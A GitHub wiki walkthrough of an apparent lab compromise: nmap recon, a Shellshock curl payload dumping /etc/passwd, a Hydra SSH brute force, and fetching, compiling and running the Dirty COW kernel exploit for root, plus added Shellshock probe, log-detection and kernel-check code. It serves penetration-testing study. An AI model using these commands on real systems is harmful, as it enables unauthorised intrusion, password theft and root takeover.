Exploit Basics - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
RECON (INFORMATION GATHERING)
Tools at your disposal
- nmap (scans for live hosts, open ports, the services and versions behind them, and much more; see Host Discovery for more)
- ping (tests whether a host answers ICMP echo; a host that does not answer may still be up behind a filter, and ping does not show the path taken, traceroute does)
- internet (look up exploits, troubleshoot, cross-reference, etc.)
- dirb (a web content scanner: it looks for existing and hidden web objects by running a dictionary-based attack against a web server and analysing the responses)
- cewl (generates wordlists from the text of a website, useful as input for password guessing)
Gather Information about your target
This can be done with the tools listed above, but many more exist; nmap alone is very versatile.
Record any and all information found. If a host answers ping, note it. If you run an nmap scan, write the output to a file and keep it (nmap's -oA saves normal, grepable and XML output at once). More information, within reason, is better.
Formatting
nmaptocsv is a good tool for formatting: it converts saved nmap output into CSV, here with a comma delimiter.
nmaptocsv -i file.txt -d ','
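To show what the formatting step actually does, here is an added example (not from the page or from nmaptocsv itself) that parses nmap's grepable (-oG) output into CSV rows. The sample scan output embedded in it is constructed for illustration and is not the scan from this page; the file name and the column set are this example's own choices.

```python
import csv
import io
import re
import sys

# Constructed sample of nmap grepable (-oG) output, written for this example;
# it is not output from the scan described on this page.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV -oG scan.gnmap 10.0.5.0/24
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6.1p1 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.7/, 443/closed/tcp//https///\tIgnored State: closed (997)
Host: 10.0.5.24 (gateway.lab)\tStatus: Up
Host: 10.0.5.24 (gateway.lab)\tPorts: 53/open/udp//domain//dnsmasq 2.75/\tIgnored State: closed (999)
# Nmap done at Mon Jan  1 00:00:05 2024 -- 256 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

FIELDS = ["host", "hostname", "port", "proto", "state", "service", "version"]

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")
PORTS_RE = re.compile(r"\tPorts: ([^\t]*)")


def parse_gnmap(text, include_closed=False):
    """Return one dict per port from grepable nmap output.

    Each entry in the Ports: field is port/state/proto/owner/service/rpcinfo/version/.
    By default only open ports are kept, which is what you want to carry into
    the next phase; pass include_closed=True to keep everything nmap listed.
    """
    rows = []
    for line in text.splitlines():
        host_match = HOST_RE.match(line)
        ports_match = PORTS_RE.search(line)
        if not host_match or not ports_match:
            continue  # comment lines, "Status: Up" lines, hosts with no ports
        host, hostname = host_match.groups()
        for entry in ports_match.group(1).split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue  # malformed entry; skip it rather than lose the host
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            if state != "open" and not include_closed:
                continue
            rows.append({
                "host": host, "hostname": hostname, "port": port, "proto": proto,
                "state": state, "service": service, "version": version,
            })
    return rows


def to_csv(rows, delimiter=","):
    """Render rows as CSV text with a header line, like nmaptocsv -d ','."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=delimiter, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python gnmap2csv.py scan.gnmap   (falls back to the built-in sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    sys.stdout.write(to_csv(parse_gnmap(text)))
```

The grepable format is a line per host, so a host with many ports is still one record; splitting it into one row per port is what makes the result greppable and sortable later in the engagement.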
Access target system
I used SSH this time. An nmap scan showed only two open ports, 22 and 80 (ssh and http). The web server exposed a CGI script under /cgi-bin/, and because a CGI server passes request headers to the script as environment variables, a Shellshock-style header (CVE-2014-6271: a bash function definition followed by a command, which a vulnerable bash executes when it imports the variable) made the server return the contents of /etc/passwd. The two echo calls emit the blank line that ends the CGI response headers, so the command output comes back in the response body. The command:
curl -H 'User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd' http://10.0.5.23/cgi-bin/status
Once I had a username from /etc/passwd, I used grep to pull likely candidates out of rockyou.txt into a smaller wordlist, then ran hydra against SSH with that username and the wordlist. Hydra returned a match, and the password worked for an SSH login.
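As an added example (not the page's own code, and not part of the author's write-up), here is the header injection above seen from both sides: a builder for the probe that the curl command sends, and detection logic that flags the same trigger in web server logs. The access log lines are constructed for this example and are not real traffic; the Apache combined log layout they follow is the only assumption.

```python
import re
import shlex

# The function-definition prefix that a bash vulnerable to CVE-2014-6271 parses
# out of any environment variable, followed by the command it then executes.
# A CGI server exports request headers as environment variables, which is why
# a crafted User-Agent reaches bash at all.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def build_probe_header(command, header="User-Agent"):
    """Header value the curl command above sends.

    The two echo calls print the blank line that ends the CGI response headers,
    so the command's output is returned in the body instead of being discarded
    as a malformed header.
    """
    return f"{header}: () {{ :; }}; echo; echo; {command}"


def curl_command(url, command):
    """The equivalent curl invocation, quoted for a POSIX shell."""
    return f"curl -H {shlex.quote(build_probe_header(command))} {shlex.quote(url)}"


def is_shellshock(value):
    """True if a header or log field carries the CVE-2014-6271 trigger."""
    return SHELLSHOCK_RE.search(value) is not None


# Constructed Apache combined-format access log lines for this example; not real traffic.
SAMPLE_LOG = [
    '10.0.5.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.5.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"',
    '10.0.5.1 - - [01/Jan/2024:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 1402 "-" "() { :; }; echo; echo; /bin/cat /etc/passwd"',
    '10.0.5.1 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 40 "() {:;}; /usr/bin/id" "curl/7.35.0"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"')


def flag_shellshock(lines):
    """Return (client_ip, path, offending_field) for each request carrying the trigger.

    Both quoted fields are checked: the payload works from any header the CGI
    handler exports, not just User-Agent. Apache writes a literal double quote
    inside these fields backslash-escaped, which this simple regex does not handle.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, _status, referer, user_agent = m.groups()
        for field in (referer, user_agent):
            if is_shellshock(field):
                hits.append((ip, path, field))
    return hits


if __name__ == "__main__":
    print(curl_command("http://10.0.5.23/cgi-bin/status", "/bin/cat /etc/passwd"))
    for hit in flag_shellshock(SAMPLE_LOG):
        print("shellshock attempt from %s against %s: %s" % hit)
```

The detection pattern tolerates the whitespace variants seen in the wild ("() {" and "(){") while ignoring ordinary parenthesised user agents such as "Mozilla/5.0 (compatible; ...)". It is a signature for the trigger, not proof of success; a 200 response with an unusually large body for a tiny CGI script, as in the third sample line, is the corroborating sign.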
Elevating to root from an unprivileged account
Once I had a shell as that user, the account had no privileges: I could not even use sudo despite knowing the password. My workaround was to use the home box I was SSHing from to download a kernel exploit, Dirty COW (CVE-2016-5195, a race in the kernel's copy-on-write handling that lets an unprivileged process write to read-only mappings), and transfer it to the target. Here is how I downloaded it
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
I then served that directory over HTTP with Python's built-in server
python -m http.server 80
On the target box I downloaded the exploit from that server, using my home box's VPN IP as the server address
I compiled it on the target box
gcc -pthread dirty.c -o dirty -lcrypt
I gave it execute permissions (gcc already sets the execute bit on its output, so this step is harmless but not strictly needed)
chmod +x dirty
Then I ran dirty
./dirty
And I was done. Here is the guide I used https://bond-o.medium.com/dirty-cow-2c79cd6859c9
Two caveats with this version of dirty.c: it rewrites /etc/passwd to add a root-level user (it saves the original to /tmp/passwd.bak first, which should be restored when you are finished), and the race it exploits can leave the kernel unstable, so a crash is possible.
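Before compiling and running a kernel exploit on a target it is worth checking whether the kernel is even in range, since a failed Dirty COW race can take the box down. The following is an added example, not from the page or from the guide linked above: it classifies a uname -r string against the upstream stable releases that first shipped the CVE-2016-5195 fix. The version cut-offs in the table are this example's assumption, and the caveats in the comments apply.

```python
import platform
import re

# Upstream stable kernel releases that first shipped the CVE-2016-5195 fix.
# Assumption behind this check: a version string below these is untouched
# upstream code. Distribution kernels backport both bugs and fixes without
# changing the version, and older long-term series (3.x, 4.1) got the fix in
# their own point releases that this table omits, so "vulnerable" here means
# "worth trying", not proof, and "not affected" is only as good as the string.
FIXED_IN = {(4, 4): 26, (4, 7): 9, (4, 8): 3}
FIXED_FROM_SERIES = (4, 9)      # 4.9 and later were released with the fix
FIRST_AFFECTED = (2, 6, 22)     # the copy-on-write race dates from 2.6.22

VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_release(release):
    """Turn a uname -r string such as 4.4.0-31-generic into (4, 4, 0)."""
    m = VERSION_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def dirtycow_status(release):
    """Classify a kernel release as 'not affected', 'fixed' or 'vulnerable'."""
    major, minor, patch = parse_release(release)
    if (major, minor, patch) < FIRST_AFFECTED:
        return "not affected"
    if (major, minor) >= FIXED_FROM_SERIES:
        return "fixed"
    fixed_patch = FIXED_IN.get((major, minor))
    if fixed_patch is not None and patch >= fixed_patch:
        return "fixed"
    return "vulnerable"


if __name__ == "__main__":
    # Run this on the target before compiling dirty.c; it only reads the version string.
    release = platform.release()
    print(f"{release}: {dirtycow_status(release)}")
    print("if you do run dirty.c: it rewrites /etc/passwd and keeps the original "
          "at /tmp/passwd.bak, so restore that copy when you are done")
```

On a distribution kernel, pair the verdict with the vendor's changelog (for example the package's changelog entry naming CVE-2016-5195) before trusting a "vulnerable" result.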